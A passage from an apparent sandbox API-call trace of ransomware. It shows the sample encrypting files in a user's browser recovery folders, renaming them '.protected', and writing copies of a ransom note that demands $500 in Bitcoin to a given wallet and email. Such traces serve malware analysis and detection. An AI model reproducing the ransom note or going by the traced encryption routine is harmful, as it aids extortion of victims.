HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\Recovery\\Last Active\\RecoveryStore.{AAE6BF5C-4991-11E7-8E2B-C43DC7584A00}.dat.protected") returned 163 [0084.883] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\Recovery\\Last Active\\RecoveryStore.{AAE6BF5C-4991-11E7-8E2B-C43DC7584A00}.dat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\internet explorer\\recovery\\last active\\recoverystore.{aae6bf5c-4991-11e7-8e2b-c43dc7584a00}.dat"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\Recovery\\Last Active\\RecoveryStore.{AAE6BF5C-4991-11E7-8E2B-C43DC7584A00}.dat.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\internet explorer\\recovery\\last active\\recoverystore.{aae6bf5c-4991-11e7-8e2b-c43dc7584a00}.dat.protected")) returned 1 [0084.884] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 1 [0084.884] lstrcmpiW (lpString1="{4BD650F0-C8F9-11E7-B5BF-C43DC7584A00}.dat", lpString2="Windows") returned -1 [0084.884] lstrcmpiW (lpString1="{4BD650F0-C8F9-11E7-B5BF-C43DC7584A00}.dat", lpString2="Program Files") returned -1 [0084.884] lstrcmpiW (lpString1="{4BD650F0-C8F9-11E7-B5BF-C43DC7584A00}.dat", lpString2="Program Files (x86)") returned -1 [0084.884] lstrcmpiW (lpString1="{4BD650F0-C8F9-11E7-B5BF-C43DC7584A00}.dat", lpString2="$Recycle.bin") returned 1 [0084.884] lstrcmpiW (lpString1="{4BD650F0-C8F9-11E7-B5BF-C43DC7584A00}.dat", lpString2="System Volume Information") returned -1 [0084.884] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\Recovery\\Last Active\\{4BD650F0-C8F9-11E7-B5BF-C43DC7584A00}.dat") returned 139 [0084.884] StrStrIW (lpFirst="{4BD650F0-C8F9-11E7-B5BF-C43DC7584A00}.dat", lpSrch=".protected") returned 0x0 [0084.884] lstrcmpW (lpString1="{4BD650F0-C8F9-11E7-B5BF-C43DC7584A00}.dat", lpString2="RESTORE_FILES.txt") returned -1 [0084.884] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e4fc | out: pbBuffer=0x295e4fc) returned 1 [0084.884] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e524*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e524*=0x30) returned 1 [0084.884] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\Recovery\\Last Active\\{4BD650F0-C8F9-11E7-B5BF-C43DC7584A00}.dat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\internet explorer\\recovery\\last active\\{4bd650f0-c8f9-11e7-b5bf-c43dc7584a00}.dat"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0084.885] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\Recovery\\Last Active\\{4BD650F0-C8F9-11E7-B5BF-C43DC7584A00}.dat") returned 139 [0084.885] StrStrW (lpFirst="{4BD650F0-C8F9-11E7-B5BF-C43DC7584A00}.dat", lpSrch=".txt") returned 0x0 [0084.885] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\Recovery\\Last Active\\{4BD650F0-C8F9-11E7-B5BF-C43DC7584A00}.dat") returned 139 [0084.885] StrStrW (lpFirst="{4BD650F0-C8F9-11E7-B5BF-C43DC7584A00}.dat", lpSrch=".rar") returned 0x0 [0084.885] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\Recovery\\Last Active\\{4BD650F0-C8F9-11E7-B5BF-C43DC7584A00}.dat") returned 139 [0084.885] StrStrW (lpFirst="{4BD650F0-C8F9-11E7-B5BF-C43DC7584A00}.dat", lpSrch=".zip") returned 0x0 [0084.885] ReadFile (in: hFile=0x154, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295e544*=0x1200, lpOverlapped=0x0) returned 1 [0084.886] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0xffffee00, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0084.886] WriteFile (in: hFile=0x154, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x1200, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295e544*=0x1200, lpOverlapped=0x0) returned 1 [0084.887] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0084.887] WriteFile (in: hFile=0x154, lpBuffer=0x295e51c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x295e51c*, lpNumberOfBytesWritten=0x295e544*=0x4, lpOverlapped=0x0) returned 1 [0084.887] WriteFile (in: hFile=0x154, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e544*=0x30, lpOverlapped=0x0) returned 1 [0084.887] CloseHandle (hObject=0x154) returned 1 [0084.887] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\Recovery\\Last Active\\{4BD650F0-C8F9-11E7-B5BF-C43DC7584A00}.dat.protected") returned 149 [0084.887] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\Recovery\\Last Active\\{4BD650F0-C8F9-11E7-B5BF-C43DC7584A00}.dat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\internet explorer\\recovery\\last active\\{4bd650f0-c8f9-11e7-b5bf-c43dc7584a00}.dat"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\Recovery\\Last Active\\{4BD650F0-C8F9-11E7-B5BF-C43DC7584A00}.dat.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\internet explorer\\recovery\\last active\\{4bd650f0-c8f9-11e7-b5bf-c43dc7584a00}.dat.protected")) returned 1 [0084.888] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 1 [0084.888] lstrcmpiW (lpString1="{69512155-C8F9-11E7-B5BF-C43DC7584A00}.dat", lpString2="Windows") returned -1 [0084.888] lstrcmpiW (lpString1="{69512155-C8F9-11E7-B5BF-C43DC7584A00}.dat", lpString2="Program Files") returned -1 [0084.888] lstrcmpiW (lpString1="{69512155-C8F9-11E7-B5BF-C43DC7584A00}.dat", lpString2="Program Files (x86)") returned -1 [0084.888] lstrcmpiW (lpString1="{69512155-C8F9-11E7-B5BF-C43DC7584A00}.dat", lpString2="$Recycle.bin") returned 1 [0084.888] lstrcmpiW (lpString1="{69512155-C8F9-11E7-B5BF-C43DC7584A00}.dat", lpString2="System Volume Information") returned -1 [0084.888] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\Recovery\\Last Active\\{69512155-C8F9-11E7-B5BF-C43DC7584A00}.dat") returned 139 [0084.888] StrStrIW (lpFirst="{69512155-C8F9-11E7-B5BF-C43DC7584A00}.dat", lpSrch=".protected") returned 0x0 [0084.888] lstrcmpW (lpString1="{69512155-C8F9-11E7-B5BF-C43DC7584A00}.dat", lpString2="RESTORE_FILES.txt") returned -1 [0084.888] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e4fc | out: pbBuffer=0x295e4fc) returned 1 [0084.888] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e524*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e524*=0x30) returned 1 [0084.888] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\Recovery\\Last Active\\{69512155-C8F9-11E7-B5BF-C43DC7584A00}.dat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\internet explorer\\recovery\\last active\\{69512155-c8f9-11e7-b5bf-c43dc7584a00}.dat"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0084.889] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\Recovery\\Last Active\\{69512155-C8F9-11E7-B5BF-C43DC7584A00}.dat") returned 139 [0084.889] StrStrW (lpFirst="{69512155-C8F9-11E7-B5BF-C43DC7584A00}.dat", lpSrch=".txt") returned 0x0 [0084.889] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\Recovery\\Last Active\\{69512155-C8F9-11E7-B5BF-C43DC7584A00}.dat") returned 139 [0084.889] StrStrW (lpFirst="{69512155-C8F9-11E7-B5BF-C43DC7584A00}.dat", lpSrch=".rar") returned 0x0 [0084.889] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\Recovery\\Last Active\\{69512155-C8F9-11E7-B5BF-C43DC7584A00}.dat") returned 139 [0084.889] StrStrW (lpFirst="{69512155-C8F9-11E7-B5BF-C43DC7584A00}.dat", lpSrch=".zip") returned 0x0 [0084.889] ReadFile (in: hFile=0x154, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295e544*=0x1200, lpOverlapped=0x0) returned 1 [0084.896] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0xffffee00, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0084.896] WriteFile (in: hFile=0x154, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x1200, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295e544*=0x1200, lpOverlapped=0x0) returned 1 [0084.897] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0084.897] WriteFile (in: hFile=0x154, lpBuffer=0x295e51c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x295e51c*, lpNumberOfBytesWritten=0x295e544*=0x4, lpOverlapped=0x0) returned 1 [0084.897] WriteFile (in: hFile=0x154, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e544*=0x30, lpOverlapped=0x0) returned 1 [0084.897] CloseHandle (hObject=0x154) returned 1 [0084.897] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\Recovery\\Last Active\\{69512155-C8F9-11E7-B5BF-C43DC7584A00}.dat.protected") returned 149 [0084.897] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\Recovery\\Last Active\\{69512155-C8F9-11E7-B5BF-C43DC7584A00}.dat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\internet explorer\\recovery\\last active\\{69512155-c8f9-11e7-b5bf-c43dc7584a00}.dat"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\Recovery\\Last Active\\{69512155-C8F9-11E7-B5BF-C43DC7584A00}.dat.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\internet explorer\\recovery\\last active\\{69512155-c8f9-11e7-b5bf-c43dc7584a00}.dat.protected")) returned 1 [0084.898] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 0 [0084.898] FindClose (in: hFindFile=0x47bad0 | out: hFindFile=0x47bad0) returned 1 [0084.898] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\Recovery\\Last Active\\RESTORE_FILES.txt") returned 114 [0084.898] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\Recovery\\Last Active\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\internet explorer\\recovery\\last active\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0084.899] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0084.899] WriteFile (in: hFile=0x150, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295e544*=0x53d, lpOverlapped=0x0) returned 1 [0084.899] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0084.899] WriteFile (in: hFile=0x150, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295e544*=0x2ac, lpOverlapped=0x0) returned 1 [0084.899] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0084.899] WriteFile (in: hFile=0x150, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295e544*=0xb1, lpOverlapped=0x0) returned 1 [0084.900] CloseHandle (hObject=0x150) returned 1 [0084.900] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 0 [0084.900] FindClose (in: hFindFile=0x47ba90 | out: hFindFile=0x47ba90) returned 1 [0084.900] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\Recovery\\RESTORE_FILES.txt") returned 102 [0084.900] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\Recovery\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\internet explorer\\recovery\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x14c [0084.900] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0084.900] WriteFile (in: hFile=0x14c, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295e7b4*=0x53d, lpOverlapped=0x0) returned 1 [0084.901] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0084.901] WriteFile (in: hFile=0x14c, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295e7b4*=0x2ac, lpOverlapped=0x0) returned 1 [0084.901] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0084.901] WriteFile (in: hFile=0x14c, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295e7b4*=0xb1, lpOverlapped=0x0) returned 1 [0084.901] CloseHandle (hObject=0x14c) returned 1 [0084.902] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0 [0084.902] FindClose (in: hFindFile=0x47ba50 | out: hFindFile=0x47ba50) returned 1 [0084.902] wnsprintfW (in: pszDest=0x504c48, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\RESTORE_FILES.txt") returned 93 [0084.902] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\internet explorer\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0084.902] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0084.902] WriteFile (in: hFile=0xd8, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ea24*=0x53d, lpOverlapped=0x0) returned 1 [0084.903] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0084.903] WriteFile (in: hFile=0xd8, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ea24*=0x2ac, lpOverlapped=0x0) returned 1 [0084.903] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0084.903] WriteFile (in: hFile=0xd8, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ea24*=0xb1, lpOverlapped=0x0) returned 1 [0084.903] CloseHandle (hObject=0xd8) returned 1 [0084.904] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0084.904] lstrcmpiW (lpString1="Media Player", lpString2="Windows") returned -1 [0084.904] lstrcmpiW (lpString1="Media Player", lpString2="Program Files") returned -1 [0084.904] lstrcmpiW (lpString1="Media Player", lpString2="Program Files (x86)") returned -1 [0084.904] lstrcmpiW (lpString1="Media Player", lpString2="$Recycle.bin") returned 1 [0084.904] lstrcmpiW (lpString1="Media Player", lpString2="System Volume Information") returned -1 [0084.904] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player") returned 70 [0084.904] lstrcmpW (lpString1="Media Player", lpString2=".") returned 1 [0084.904] lstrcmpW (lpString1="Media Player", lpString2="..") returned 1 [0084.904] wnsprintfW (in: pszDest=0x504c48, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\*") returned 72 [0084.904] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\*", lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0x47ba50 [0084.905] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0084.905] lstrcmpiW (lpString1=".", lpString2="Program 